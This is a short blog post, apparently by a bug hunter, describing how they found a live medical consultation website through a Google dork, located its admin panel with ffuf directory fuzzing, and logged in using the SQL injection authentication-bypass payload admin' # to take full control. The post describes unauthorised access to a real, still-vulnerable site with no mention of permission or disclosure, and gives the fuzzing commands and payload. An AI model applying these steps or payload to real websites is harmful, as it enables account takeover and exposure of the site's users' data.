How Hackers Takeover Website Admin Account.

Hi Hunters, I Hope You are all doing well. so today in this post I will show you, how Hackers Login Admin Account, Without Username & Password. This is basically Auth SQL Injection Vulnerability.

What is Auth SQL

Auth SQL Injection is a technique used to exploit user data through web page inputs by injecting SQL commands as statements. Auth basically, these statement can be used to manipulate the application's  web server by malicious users.


How I Take Over Admin Account.

Step.1- First I Found a doctor's consultant website. Using google dork. I Can't tell the name of this website, because this vulnerability presented now. for example, we name it

Step.2- after coming to the website, my next task was to find the admin login panel of the website. so for this I used ffuz tool, which is used to finding the web directory.
ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u

After fuzzing we found some web directories, as you can see in the image below.

Step.3- after fuzzing, we found the web directory named /dec. we added it inside the url like; after entering we saw that there is no admin panel here. like you are able to see the image given below.

Step.4- due to not getting the admin panel, we again started fuzzing the now directory like;
ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u

this time we were to able to successfully find some admin directories while fuzzing. as you can see in the image below, that we have got the admin directory.

Step.5- after getting the admin directory, I could not stay. I quickly copied it and searched it by putting it inside my previous Url like; Got Admin Login page.

Step.6- after getting the admin panel, I tried to enter the Default credentials like admin, password. but Not Luck. after that I tried SQL Injection like Auth SQL payload. admin' #  and finally successfully I Have logged in Admin Account. I can Control the whole account now.


this vulnerability is much more critical, because attacker full control admin account, he is delete any user, add , modify and more. and attacker have complete control of your website.

so I Hope you liked and enjoy this blog post. and you must have got to know something new. Happy Hacking..

If you have not understood anything in the blog post, the I am providing you the video below. you can see him.

Post a Comment